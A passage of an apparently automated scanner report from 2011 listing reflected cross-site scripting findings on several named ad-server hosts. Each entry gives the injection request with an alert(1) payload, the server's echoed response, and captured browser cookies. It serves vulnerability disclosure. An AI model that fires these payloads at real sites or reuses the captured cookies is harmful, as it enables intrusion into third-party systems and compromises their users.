ick%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=72dd35"-alert(1)-"77d42671dca&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den");
var fscUrl =
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/N5554.acerno.com/B5224009.7 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5554.acerno.com/B5224009.7

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52806'-alert(1)-'1950dbb4dde was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5554.acerno.com/B5224009.7;click=52806'-alert(1)-'1950dbb4dde HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?UbwUAGFwDADJKoIAAAAAAHC4EQAAAAAAAgAEAAYAAAAAAP8AAAABDTF.GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACqsvTHEBzPCVCAR.nLIFOdMgiZVYfnKjX27zwEAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3Fsize%3D728x90%26m%3D3%26l%3D1177298%26c%3D150,Z%3D728x90%26s%3D815201%26_salt%3D3980777459%26B%3D10%26r%3D0,79331f34-5316-11e0-a8b1-001b24784a22
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 257
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:26:31 GMT
Expires: Sun, 20 Mar 2011 17:26:31 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/4/1c/%2a/n;44306;0-0;0;59623952;1-468/60;0/0/0;;~sscs=%3f52806'-alert(1)-'1950dbb4dde"><img src="http://s0.2mdn.net/v
...[SNIP]...

4.43. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b37d"-alert(1)-"45e6ab6a264 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?pfm=1&ttch=ch&tgdg=ch&titn=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=62870&ad_type=ad&section=1426204&ad_size=728x90&8b37d"-alert(1)-"45e6ab6a264=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/top_728_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVER=8; TMEDIA=Coun%3ANA%2FPostal%3ANA%2F; TMEDIACATS2=%5E38%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19%2F%5E44%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19; TMEDIAUUID=015310CD%2D0616%2D46BE%2DB1EA143CC96AEC60

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:26:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 20 Mar 2011 17:26:17 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?8b37d"-alert(1)-"45e6ab6a264=1&Z=728x90&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1426204&tgdg=ch&titn=ch&ttch=ch&uatRandNo=62870&_salt=3992706049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i
...[SNIP]...

4.44. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf7e"-alert(1)-"a56ead6dc0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=674716&bur=75598&x=http://www.burstnet.com/ads/ad16597a-map.cgi/BCPG175405.254264.267318/VTS=2RFkT._GgX/K=ADS_T150/SZ=120X600A|160X600A/V=2.3S//REDIRURL=&7cf7e"-alert(1)-"a56ead6dc0c=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; pv1="b!!!!-!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#`ac!$5*F!$i@e!0oZP!%GRx!!H<)!?5%!$qXJ3!@Dj0!'NRE~~~~~~~<qc=9<sGhr!!!([!!Rl,!!E)$!$XwU!0pbc!$so$!#a.3!!,)#%5tS5!]7:6!%4=%!%g*F~~~~~~<qd6K<smWP!!!([!!v#F#IxPE!$Wiw!(^yZ!#PIK!!!%%!?5%!$px$-!w1K*!%0]Y!%7E2!$/h8~~~~~<rmNa~~"; bh="b!!!%$!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!#<re$l!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#*Xa!!!!#<rao$!#*Xb!!!!#<r)hx!#*Xc!!!!#<r)hx!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#Km+!!!!#<qppS!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f__!!!!#<pd^@!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!#<rmV9!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!#<rmV:!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; ih="b!!!!R!%?RR!!!!'<rmNX!%?Rl!!!!%<rmNX!%?m7!!!!#<p]i+!'4A7!!!!%<rmNV!'4A9!!!!%<rmNV!(4uP!!!!#<p^*H!(^yZ!!!!#<rmNa!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!+%qt!!!!#<roWO!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!#<qc=8!.$Cr!!!!#<qc=7!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!#<qn]D!0oZP!!!!#<qc=9!0pbc!!!!$<qd6K!0vr,!!!!$<raoq!1%3H!!!!#<qc=7!1(-6!!!!#<rmN+!1/X3!!!!(<rmb3!1/X6!!!!)<rmb2!1/]r!!!!(<rmb3!104d!!!!#<qn]E!1:dV!!!!#<rmMp"; vuday1=[cdPJI7PHzX9H4W4d=[p1[Y'G!3w>8BIdqh; BX=6l13v316lnh2l&b=4&s=8i&t=47; liday1=8eD/sfr=wM!!o(>l-VP:9.<FK!3w>8iPO%U

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:25:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 20 Mar 2011 17:25:56 GMT
Pragma: no-cache
Content-Length: 5211
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?7cf7e"-alert(1)-"a56ead6dc0c=1&Z=160x600&bur=75598&s=674716&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad16597a%2dmap.cgi%2fBCPG175405.254264.267318%2fVTS%3d2RFkT.%5fGgX%2fK%3dADS%5fT150%2fSZ%3d120X600A%7c160X600A%2fV%3d2.3S%2f%2fRE
...[SNIP]...

4.45. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 315ee<script>alert(1)</script>f72375c49d4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=0xIawmmrsYYagWK1_6772529315ee<script>alert(1)</script>f72375c49d4 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A96D224D3326D49C0D5BFDEEC19E8ADD; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 20 Mar 2011 17:26:47 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
E_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_0xIawmmrsYYagWK1_6772529315ee<script>alert(1)</script>f72375c49d4".replace(/[^\w\d]/g,""),"0xIawmmrsYYagWK1_6772529315ee<script>
...[SNIP]...

4.46. http://ads.newtention.net/ads [et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.newtention.net
Path:   /ads

Issue detail

The value of the et request parameter is copied into an HTML comment. The payload 948da--><script>alert(1)</script>b81f0b3d616 was submitted in the et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads?rt=2&et=1948da--><script>alert(1)</script>b81f0b3d616&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1
Host: ads.newtention.net
Proxy-Connection: keep-alive
Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:54:23 GMT
Content-Type: text/html
Content-Length: 294
P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT"
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head></head>
<body style="margin:0; padding:0;">
<!--
Not supported event type (1948da--><script>alert(1)</script>b81f0b3d616)!
AdServer: app09
-->
...[SNIP]...

4.47. http://ads.newtention.net/ads [rt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.newtention.net
Path:   /ads

Issue detail

The value of the rt request parameter is copied into an HTML comment. The payload 25d7e--><script>alert(1)</script>022e12d8c56 was submitted in the rt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads?rt=225d7e--><script>alert(1)</script>022e12d8c56&et=1&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1
Host: ads.newtention.net
Proxy-Connection: keep-alive
Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:54:23 GMT
Content-Type: text/html
Content-Length: 296
P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT"
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head></head>
<body style="margin:0; padding:0;">
<!--
Not supported request type (225d7e--><script>alert(1)</script>022e12d8c56)!
AdServer: app09
-->
...[SNIP]...

4.48. http://ads.newtention.net/ads [se parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.newtention.net
Path:   /ads

Issue detail

The value of the se request parameter is copied into an HTML comment. The payload 1f60d--><script>alert(1)</script>0d94a310df2 was submitted in the se parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads?rt=2&et=1&bi=46019&se=m1f60d--><script>alert(1)</script>0d94a310df2&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1
Host: ads.newtention.net
Proxy-Connection: keep-alive
Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:54:24 GMT
Content-Type: text/html
Content-Length: 307
P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT"
Vary: Accept-Encoding
Connection: close

